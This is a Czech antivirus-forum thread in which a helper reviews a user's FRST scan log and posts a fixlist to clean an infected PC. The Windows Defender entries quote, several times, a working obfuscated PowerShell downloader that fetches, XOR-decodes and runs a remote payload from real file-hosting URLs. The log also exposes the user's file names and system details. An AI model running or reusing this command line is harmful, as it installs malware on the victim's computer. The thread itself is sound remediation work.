FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

13-01-2021 21:32:33 Instalační služba modulů systému Windows

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (01/20/2021 08:00:00 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============
Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.


Windows Defender:
===================================
Date: 2021-01-20 19:28:36.8570000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2538.0, AS: 1.329.2538.0, NIS: 1.329.2538.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 18:14:17.7510000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2534.0, AS: 1.329.2534.0, NIS: 1.329.2534.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 17:09:21.2090000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2528.0, AS: 1.329.2528.0, NIS: 1.329.2528.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 15:18:54.2110000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {5BABBB36-9445-4077-8621-59FC0CF7C04A}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-20 11:15:09.7920000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2519.0, AS: 1.329.2519.0, NIS: 1.329.2519.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

==================== Memory info ===========================

BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 90%
Total physical RAM: 3767.05 MB
Available physical RAM: 356.34 MB
Total Virtual: 7351.05 MB
Available Virtual: 3556.64 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.19 GB) (Free:62.69 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:230.27 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32

\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 3 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)

==================== End of Addition.txt =======================

Rudy
Site Admin
Posts: 118371
Joined: 30 Oct 2003 13:42
Location: Plzeň

Re: Please check my log

#12 Post by Rudy »

Open Notepad and copy the following into it:
Start

CloseProcesses:
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
C:\WINDOWS\AutoKMS

EmptyTemp:
Hosts:
End
Save it to the desktop as fixlist.txt. Run FRST again and click >Fix<. When it finishes, a log will appear; copy it here.
Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activity, a virus can damage the system!


Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want to reactivate the thread, write to me at the e-mail address given above.

chenny
Visitor
Posts: 36
Registered: 06 Sep 2007 09:50

Re: Please check my log

#13 Post by chenny »

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 20:16:06) Run:1
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
